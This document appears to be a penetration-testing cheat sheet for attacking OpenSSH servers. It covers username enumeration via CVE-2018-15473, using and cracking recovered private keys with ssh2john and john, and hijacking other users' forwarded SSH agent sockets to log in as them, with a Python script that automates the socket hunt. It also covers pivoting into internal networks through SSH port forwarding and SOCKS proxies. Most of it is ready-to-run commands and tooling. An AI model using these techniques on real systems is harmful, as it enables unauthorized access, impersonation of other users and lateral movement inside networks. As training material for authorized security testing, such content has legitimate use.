OpenSSH
What it is: The standard SSH server on virtually every Linux/Unix system. Remote code execution against a current, patched sshd is rare, so the practical attack surface is username enumeration on old builds, stolen or reused private keys, forwarded agents, and permissive configuration (password auth, agent and TCP forwarding left enabled).
Default ports: 22
Vuln research:
Username enumeration (CVE-2018-15473)
OpenSSH <= 7.7 (fixed in 7.8) — Determine valid usernames. A malformed authentication packet makes the server disconnect for a valid user but return an auth failure for an invalid one; patched builds behave identically in both cases.
# Check the banner first to see whether the version is in range:
nc -nv $IP 22
# Public PoC script:
python3 ssh_enum.py $IP -u root
python3 ssh_enum.py $IP -U users.txt
# Or Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS $IP
set USER_FILE users.txt
run
SSH key exploitation
If you find a private key — Use it
# Found id_rsa in a share, web dir, or LFI. Legacy PEM keys announce a passphrase with "Proc-Type: 4,ENCRYPTED";
# new-format (BEGIN OPENSSH PRIVATE KEY) keys do not, so just try them:
head -2 id_rsa
chmod 600 id_rsa
ssh -i id_rsa -o IdentitiesOnly=yes user@$IP
# The matching id_rsa.pub comment or an authorized_keys entry often gives you the username
# If passphrase protected:
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
john --show ssh.hash
# New-format keys use a bcrypt KDF, so cracking is far slower than for legacy PEM keys
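Before feeding a recovered key to ssh or ssh2john it helps to know what you actually have. The following is an added example, not code from the original page or from OpenSSH: a standard-library Python triage script that reads the PEM armor, parses the plaintext header of the openssh-key-v1 container (a cipher of "none" means no passphrase) or the Proc-Type header of a legacy PEM key, and reports whether cracking is needed before use. The sample keys inside are constructed with dummy key material so the script runs offline; they are not real keys, and the filename key_triage.py is an assumption.

```python
"""Triage a private key recovered from a share, web root or LFI before trying it:
which container format it is, whether it needs a passphrase (so ssh2john/john
come first), and the key type. Standard library only.
The sample keys below are constructed here with dummy key material so the
script runs offline; they are not real or usable keys."""
import base64
import struct
import sys


def _ssh_string(b: bytes) -> bytes:
    """Encode an SSH wire-format string: uint32 big-endian length + bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int):
    """Decode an SSH wire-format string at off; returns (bytes, new_offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def parse_openssh_v1(blob: bytes) -> dict:
    """Parse the plaintext header of the 'openssh-key-v1' container used by
    BEGIN OPENSSH PRIVATE KEY files: magic, cipher, kdf, kdfoptions, nkeys,
    public key. cipher == 'none' means the key has no passphrase."""
    magic = b"openssh-key-v1\x00"
    if not blob.startswith(magic):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(magic)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    pubkey, _ = _read_string(blob, off + 4)
    key_type, _ = _read_string(pubkey, 0)   # public key blob starts with its type name
    return {"format": "openssh-v1", "encrypted": cipher != b"none",
            "cipher": cipher.decode(), "kdf": kdf.decode(),
            "key_type": key_type.decode(), "nkeys": nkeys}


def triage_key(text: str) -> dict:
    """Classify a PEM-armored private key (OpenSSH new format, legacy PEM, or
    PKCS#8) and report whether it is passphrase-protected."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) < 3 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("no PEM armor found")
    label = lines[0][len("-----BEGIN "):].rstrip("-").strip()
    body = lines[1:-1]
    if label == "OPENSSH PRIVATE KEY":
        return parse_openssh_v1(base64.b64decode("".join(body)))
    # Legacy PEM may carry RFC 1421 headers before a blank line; base64 never contains ':'.
    headers = {}
    while body and ":" in body[0]:
        k, v = body.pop(0).split(":", 1)
        headers[k.strip()] = v.strip()
    encrypted = label == "ENCRYPTED PRIVATE KEY" or "ENCRYPTED" in headers.get("Proc-Type", "")
    key_type = label.replace("ENCRYPTED ", "").replace(" PRIVATE KEY", "") or "unknown (PKCS#8)"
    return {"format": "pkcs8" if key_type.startswith("unknown") else "pem",
            "encrypted": encrypted, "cipher": headers.get("DEK-Info", "none"),
            "key_type": key_type}


def recommend(info: dict) -> str:
    """Next step for the operator, mirroring the cheat-sheet commands."""
    if not info["encrypted"]:
        return "no passphrase: chmod 600 and use directly with ssh -i"
    slow = " (bcrypt KDF: expect slow cracking)" if info.get("kdf") == "bcrypt" else ""
    return "passphrase-protected: ssh2john key > ssh.hash; john ssh.hash --wordlist=..." + slow


def build_openssh_sample(encrypted: bool) -> str:
    """Constructed sample: structurally valid openssh-key-v1 file with all-zero
    dummy material. The encrypted variant uses the aes256-ctr/bcrypt pair that
    ssh-keygen emits for passphrase-protected keys."""
    pub = _ssh_string(b"ssh-ed25519") + _ssh_string(b"\x00" * 32)
    if encrypted:
        cipher, kdf = b"aes256-ctr", b"bcrypt"
        kdfopts = _ssh_string(b"\x00" * 16) + struct.pack(">I", 16)   # salt, rounds
    else:
        cipher, kdf, kdfopts = b"none", b"none", b""
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1) + _ssh_string(pub)
            + _ssh_string(b"\x00" * 64))                               # dummy private section
    b64 = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy PEM samples; the base64 body is a dummy placeholder.
PEM_PLAIN = "-----BEGIN RSA PRIVATE KEY-----\nQUFBQQ==\n-----END RSA PRIVATE KEY-----\n"
PEM_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\n"
                 "Proc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\n"
                 "QUFBQQ==\n-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    samples = [("openssh plain", build_openssh_sample(False)),
               ("openssh encrypted", build_openssh_sample(True)),
               ("pem plain", PEM_PLAIN), ("pem encrypted", PEM_ENCRYPTED)]
    if len(sys.argv) > 1:                      # usage: python3 key_triage.py id_rsa
        samples = [(sys.argv[1], open(sys.argv[1]).read())]
    for name, text in samples:
        info = triage_key(text)
        print(f"{name}: {info}\n  -> {recommend(info)}")
```

Run it with no arguments to see the four constructed samples classified, or point it at a real file with `python3 key_triage.py id_rsa`. Only the container header is parsed; nothing is decrypted, so the script is safe to run on any blob you find.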
SSH agent forwarding hijack
If agent forwarding is enabled — Hijack other users' keys
# Works when another user has connected into this box with agent forwarding (ssh -A / ForwardAgent yes).
# sshd creates /tmp/ssh-XXXXXX/ with mode 0700 for their session, so you need root or their uid to use it.
# Find SSH agent sockets:
ls -la /tmp/ssh-*/
# Or pull the socket path from live session environments (as root):
grep -z SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'
# If you can reach another user's socket:
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXX/agent.XXXXX
ssh-add -l # List their keys (you never obtain the private key, only signatures while their session lives)
ssh user@other-host # Authenticate with their keys
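As an added example (not part of the original page and not OpenSSH code), a Python helper that automates the socket hunt above: it walks a base directory for ssh-*/agent.* unix sockets, records the owner uid, and tests reachability by actually connecting, which is the only check that matters because the socket directory is 0700 and a socket you cannot open is useless. demo() builds a constructed temp tree with a dummy listening socket standing in for a forwarded agent so the logic runs offline; list_agent_keys() shells out to the real ssh-add and is only meaningful on a live target.

```python
"""Enumerate forwarded ssh-agent sockets on a host you have a shell on and
test which ones your current uid can actually open. sshd creates
/tmp/ssh-XXXXXXXXXX/ with mode 0700 owned by the session user, so an
unprivileged user normally sees only their own; root can reach them all.
demo() builds a constructed tree with a live dummy socket so this runs offline."""
import os
import shutil
import socket
import stat
import subprocess
import sys
import tempfile


def can_connect(path: str) -> bool:
    """The real access test: try to connect to the unix socket."""
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        s.settimeout(1)
        s.connect(path)
        return True
    except OSError:
        return False
    finally:
        s.close()


def find_agent_sockets(base: str = "/tmp") -> list:
    """Return one record per ssh-*/agent.* unix socket under base: path, owner
    uid, and whether we can connect. Directories we cannot list are reported
    with path None so you know a target exists but needs more privilege."""
    found = []
    try:
        dirs = [d for d in os.listdir(base) if d.startswith("ssh-")]
    except OSError:
        return found
    for d in dirs:
        dpath = os.path.join(base, d)
        try:
            names = os.listdir(dpath)
        except OSError:                      # 0700 and not ours
            found.append({"dir": dpath, "path": None,
                          "uid": os.stat(dpath).st_uid, "accessible": False})
            continue
        for n in names:
            p = os.path.join(dpath, n)
            st = os.lstat(p)
            if n.startswith("agent.") and stat.S_ISSOCK(st.st_mode):
                found.append({"dir": dpath, "path": p, "uid": st.st_uid,
                              "accessible": can_connect(p)})
    return found


def list_agent_keys(sock_path: str):
    """Equivalent of `SSH_AUTH_SOCK=... ssh-add -l`; returns stdout or None."""
    env = dict(os.environ, SSH_AUTH_SOCK=sock_path)
    try:
        r = subprocess.run(["ssh-add", "-l"], env=env, capture_output=True,
                           text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return r.stdout if r.returncode == 0 else None


def demo() -> list:
    """Constructed environment: a temp dir with ssh-demo/agent.1 as a listening
    unix socket (stands in for a forwarded agent) plus a decoy regular file."""
    base = tempfile.mkdtemp()
    sdir = os.path.join(base, "ssh-demo")
    os.mkdir(sdir, 0o700)
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(os.path.join(sdir, "agent.1"))
    srv.listen(1)
    open(os.path.join(sdir, "agent.notasocket"), "w").close()   # must be ignored
    try:
        return find_agent_sockets(base)
    finally:
        srv.close()
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "/tmp"
    for rec in find_agent_sockets(base):
        print(rec)
        if rec["accessible"]:
            print(list_agent_keys(rec["path"]))
    print("demo:", demo())
```

On a real host run it as the user you have, then again after escalating: a record with path None means a session directory you could not even list, which is the usual picture for an unprivileged shell.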
SSH port forwarding abuse
If you have SSH access — Reach internal services
# Local forward (expose a service bound only to the target's loopback on your box):
ssh -N -L 8080:127.0.0.1:8080 user@$IP
# Now visit http://127.0.0.1:8080 on your machine
# Forward to a third host that only the target can reach:
ssh -N -L 3389:$INTERNAL:3389 user@$IP
# Dynamic SOCKS proxy:
ssh -N -D 9050 user@$IP
# Add "socks5 127.0.0.1 9050" to /etc/proxychains4.conf, then e.g.: proxychains4 nmap -sT -Pn $INTERNAL
# "open failed: administratively prohibited" means AllowTcpForwarding is disabled in sshd_config